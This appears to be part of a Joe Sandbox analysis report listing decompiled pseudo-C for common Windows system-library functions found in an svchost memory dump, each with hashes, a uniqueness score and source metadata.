                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c7f7633fe34255c61a1118fed9180f014bf74a6c45add0d28a8a944733d5dde
                        • Instruction ID: 16d966d1bb1403bccd14886a5b37d41778c47415fb848408dca9702c96df6d79
                        • Opcode Fuzzy Hash: 0c7f7633fe34255c61a1118fed9180f014bf74a6c45add0d28a8a944733d5dde
                        • Instruction Fuzzy Hash: 2A015275A01318AFCB14DFA9D841EEEB7B8EF84710F044066B914EB280DA749A41C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E14FB Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E030E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x311d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0306FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03047D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0306B640(E03069AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                        0x030e14fb
                        0x030e14fb
                        0x030e150a
                        0x030e1514
                        0x030e1519
                        0x030e151b
                        0x030e1526
                        0x030e152c
                        0x030e1534
                        0x030e1537
                        0x030e153a
                        0x030e1545
                        0x030e1557
                        0x030e1547
                        0x030e1550
                        0x030e1550
                        0x030e1562
                        0x030e1563
                        0x030e1565
                        0x030e156a
                        0x030e157f

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2668a36e6e9f714e4b55fcfe31bf18f40967a6016ec8485fde20c2f2aea855fe
                        • Instruction ID: f2b59e0214f5e2c5bf71c5213c3f2229be483265702c65c1b3500af44df46b02
                        • Opcode Fuzzy Hash: 2668a36e6e9f714e4b55fcfe31bf18f40967a6016ec8485fde20c2f2aea855fe
                        • Instruction Fuzzy Hash: 11015275A01358AFCB14DF69D845EEEB7B8EF84710F444066F915EB380DA74DA40CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030258EC Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E030258EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x311d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3005c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03025943() != 0 &&  *0x3115320 > 5) {
					E030A7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E030A7B5E( &_v28, _t28);
					_t11 = E030A7B9C(0x3115320, 0x300bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0306B640(_t11, _t17, _v8 ^ _t29, 0x300bf15, _t27, _t28);
			}















                        0x030258fb
                        0x030258fe
                        0x03025906
                        0x0302590a
                        0x0302593c
                        0x0302593c
                        0x0302590c
                        0x0302590c
                        0x03025911
                        0x00000000
                        0x03025913
                        0x03025913
                        0x03025913
                        0x03025911
                        0x0302591d
                        0x03081035
                        0x0308103c
                        0x0308103f
                        0x03081056
                        0x03081056
                        0x0302593b

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85d235a58a95382e851e0a73b91a2934313c544257c5081b041740a516457718
                        • Instruction ID: 00bb7c9d20ad199a54b322eb70c9c4968e819ec4d76ff5a8db4a216b8dbce6bd
                        • Opcode Fuzzy Hash: 85d235a58a95382e851e0a73b91a2934313c544257c5081b041740a516457718
                        • Instruction Fuzzy Hash: A801F771A12618ABC714EBAADC00AFEFBE9EFC6520F5840699805DB244DF30DD06C754
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303B02A Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0303B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03047D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E030A7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                        0x0303b037
                        0x0303b039
                        0x0303b03b
                        0x0303b040
                        0x0308a60e
                        0x00000000
                        0x00000000
                        0x0308a61d
                        0x0303b04b
                        0x0303b04e
                        0x0308a627
                        0x0308a634
                        0x00000000
                        0x00000000
                        0x0308a641
                        0x0308a653
                        0x0308a643
                        0x0308a64c
                        0x0308a64c
                        0x0308a65b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0308a66c
                        0x0303b057
                        0x0303b057
                        0x0303b057
                        0x0303b046
                        0x0303b046
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: 96dcc5f6b2bd30ab8ecd7fbf86374e5f6b749016fbd7421cc39716543da68f06
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 9601847130AA80DFD322DB5DC944FAA77DCEB86B54F0D44A2F915CBA51D728DC40CA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F1074 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030F1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E030F165E(__ebx, 0x3118ae4, (__edx -  *0x3118b04 >> 0x14) + (__edx -  *0x3118b04 >> 0x14), __edi, __ecx, (__edx -  *0x3118b04 >> 0x14) + (__edx -  *0x3118b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E030EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03047D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E030DFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                        0x030f1074
                        0x030f1080
                        0x030f1082
                        0x030f108a
                        0x030f108f
                        0x030f1093
                        0x030f10ab
                        0x030f10ab
                        0x030f10c3
                        0x030f10cf
                        0x030f10e1
                        0x030f10d1
                        0x030f10da
                        0x030f10da
                        0x030f10e9
                        0x030f10f5
                        0x030f10f5
                        0x030f10fe

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da40b31780209b5de37eb5ee877c92717e11327f84c020c6b475e5dcedbe3db9
                        • Instruction ID: 8e5ef6b2fd75579bfdd258e927d2fe076156ada1cb43fdc285ff348d6d3cbfea
                        • Opcode Fuzzy Hash: da40b31780209b5de37eb5ee877c92717e11327f84c020c6b475e5dcedbe3db9
                        • Instruction Fuzzy Hash: 2C019772205341EFC314EF29C940B5AB7E5ABC4300F08CA29F98287A90EF70D840CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030DFE3F Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E030DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x311d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0306FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03047D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0306B640(E03069AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x030dfe3f
                        0x030dfe3f
                        0x030dfe4e
                        0x030dfe58
                        0x030dfe5d
                        0x030dfe5f
                        0x030dfe6a
                        0x030dfe72
                        0x030dfe75
                        0x030dfe78
                        0x030dfe83
                        0x030dfe95
                        0x030dfe85
                        0x030dfe8e
                        0x030dfe8e
                        0x030dfea0
                        0x030dfea1
                        0x030dfea3
                        0x030dfea8
                        0x030dfebd

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42a03fdebbbc49caae26c0361a5b3c86c949347d6ddf5020d771801f50fb36bf
                        • Instruction ID: 4b8e2556df310b239832494eab5ef7d129d433415dada878f8d3f818d4d5f4c3
                        • Opcode Fuzzy Hash: 42a03fdebbbc49caae26c0361a5b3c86c949347d6ddf5020d771801f50fb36bf
                        • Instruction Fuzzy Hash: F4018475A01319ABCB14DFA9D845FAEB7F8EF84700F044066B901EF281DA749A01CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030DFEC0 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E030DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x311d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0306FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03047D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0306B640(E03069AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x030dfec0
                        0x030dfec0
                        0x030dfecf
                        0x030dfed9
                        0x030dfede
                        0x030dfee0
                        0x030dfeeb
                        0x030dfef3
                        0x030dfef6
                        0x030dfef9
                        0x030dff04
                        0x030dff16
                        0x030dff06
                        0x030dff0f
                        0x030dff0f
                        0x030dff21
                        0x030dff22
                        0x030dff24
                        0x030dff29
                        0x030dff3e

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77663a273dfdaed12fba6871ab5eb1bd4c9e29ea69ebf85f9e185b649a270c71
                        • Instruction ID: a5607b018f872632b351c0291301085119361e45bafc1cfcad15a6450fb4d11c
                        • Opcode Fuzzy Hash: 77663a273dfdaed12fba6871ab5eb1bd4c9e29ea69ebf85f9e185b649a270c71
                        • Instruction Fuzzy Hash: 92018475A01319ABCB14DFA9D845FAEB7F8EF84700F044066B901EF280DA749A01C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F8A62 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E030F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x311d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03047D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0306B640(E03069AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x030f8a62
                        0x030f8a71
                        0x030f8a79
                        0x030f8a82
                        0x030f8a85
                        0x030f8a89
                        0x030f8a8c
                        0x030f8a8f
                        0x030f8a92
                        0x030f8a95
                        0x030f8a9f
                        0x030f8ab1
                        0x030f8aa1
                        0x030f8aaa
                        0x030f8aaa
                        0x030f8abc
                        0x030f8abd
                        0x030f8abf
                        0x030f8ac4
                        0x030f8ada

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cb07d6ad306ab5b74c9ba2ab5f322b2c3df8bccc87a818877fda974aced472f
                        • Instruction ID: cc9d97736c563fe029ab23e07d98e86709acdd9cf77cffbb7fa27829e7936ad9
                        • Opcode Fuzzy Hash: 0cb07d6ad306ab5b74c9ba2ab5f322b2c3df8bccc87a818877fda974aced472f
                        • Instruction Fuzzy Hash: D1011EB5A01218AFDB04DFA9D9419EEB7F8EF88710F10405AF904EB341D634AA008BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F8ED6 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E030F8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x311d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03047D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0306B640(E03069AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                        0x030f8ed6
                        0x030f8ee5
                        0x030f8eed
                        0x030f8ef0
                        0x030f8efa
                        0x030f8f03
                        0x030f8f0c
                        0x030f8f15
                        0x030f8f24
                        0x030f8f27
                        0x030f8f31
                        0x030f8f43
                        0x030f8f33
                        0x030f8f3c
                        0x030f8f3c
                        0x030f8f4e
                        0x030f8f4f
                        0x030f8f51
                        0x030f8f56
                        0x030f8f69

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62475c19103205d016b263934731a72d6f6861e58fe6ba380830b5cc185c3309
                        • Instruction ID: f74b5a135bae7c444d9f9e7acb58c8b173e5cfd1321185b9456ff6791c682124
                        • Opcode Fuzzy Hash: 62475c19103205d016b263934731a72d6f6861e58fe6ba380830b5cc185c3309
                        • Instruction Fuzzy Hash: A4111EB4A112199FDB04DFA9D541BAEF7F4FF08300F0482AAE518EB781E6349A40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302DB60 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0302DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0302DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0302E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0302E8B0(__ecx, _t14, 0xfff);
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                        0x0302db64
                        0x0302db66
                        0x0302db6b
                        0x0302dbaa
                        0x0302db71
                        0x0302db76
                        0x0302db7a
                        0x0302dba3
                        0x0302db7c
                        0x0302db87
                        0x0302db8b
                        0x03084fa1
                        0x03084fb3
                        0x03084fb8
                        0x0302db91
                        0x0302db96
                        0x0302db98
                        0x0302db98
                        0x0302db8b
                        0x0302db7a
                        0x0302db9d
                        0x0302dba2

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: b9b71b8069bc8ab9d43fc6146beb411042600c03594a09eeef5b086bc640f1ca
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: 8AF09C37247632DBD733EA5588A0FABFE959FC2A60F190435F6159F344CA608C0297D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302B1E1 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0302B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03047D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03047D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E030A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                        0x0302b1e8
                        0x0302b1ea
                        0x0302b1f3
                        0x03084a17
                        0x0302b1f9
                        0x0302b1f9
                        0x0302b1f9
                        0x0302b201
                        0x03084a21
                        0x03084a2e
                        0x00000000
                        0x00000000
                        0x03084a3b
                        0x03084a4d
                        0x03084a3d
                        0x03084a46
                        0x03084a46
                        0x03084a55
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0302b20a
                        0x0302b20a
                        0x0302b20a
                        0x0302b20a

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 1d65b0c15daa9c513e831aa437858cdc6bc386f44b3f33f4578089df10206041
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 5001D132202790EBD322E75EC804FA9BBD8EF91750F0D48A1F9548F6B1D678C800C354
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030BFE87 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E030BFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x311d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03047D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0306B640(E03069AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                        0x030bfe96
                        0x030bfe9e
                        0x030bfea1
                        0x030bfead
                        0x030bfeb3
                        0x030bfeb9
                        0x030bfec3
                        0x030bfed5
                        0x030bfec5
                        0x030bfece
                        0x030bfece
                        0x030bfee0
                        0x030bfee1
                        0x030bfee3
                        0x030bfee8
                        0x030bfefb

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c5bb2a9072577ed2540f5d63343e15eaa8a88e72e5fa3e27deaa1491eafe11dc
                        • Instruction ID: 0b57897d037b6258218fd468057635d58c0017b564b93e1ed6bb37cf3d49e692
                        • Opcode Fuzzy Hash: c5bb2a9072577ed2540f5d63343e15eaa8a88e72e5fa3e27deaa1491eafe11dc
                        • Instruction Fuzzy Hash: CB016274A01309AFCB14DFA8D941AAEB7F4EF08300F144569B514DF382DA35DA01CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E131B Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E030E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x311d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03047D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0306B640(E03069AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                        0x030e131b
                        0x030e132a
                        0x030e1330
                        0x030e1336
                        0x030e133e
                        0x030e1341
                        0x030e1344
                        0x030e134f
                        0x030e1361
                        0x030e1351
                        0x030e135a
                        0x030e135a
                        0x030e136c
                        0x030e136d
                        0x030e136f
                        0x030e1374
                        0x030e1387

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
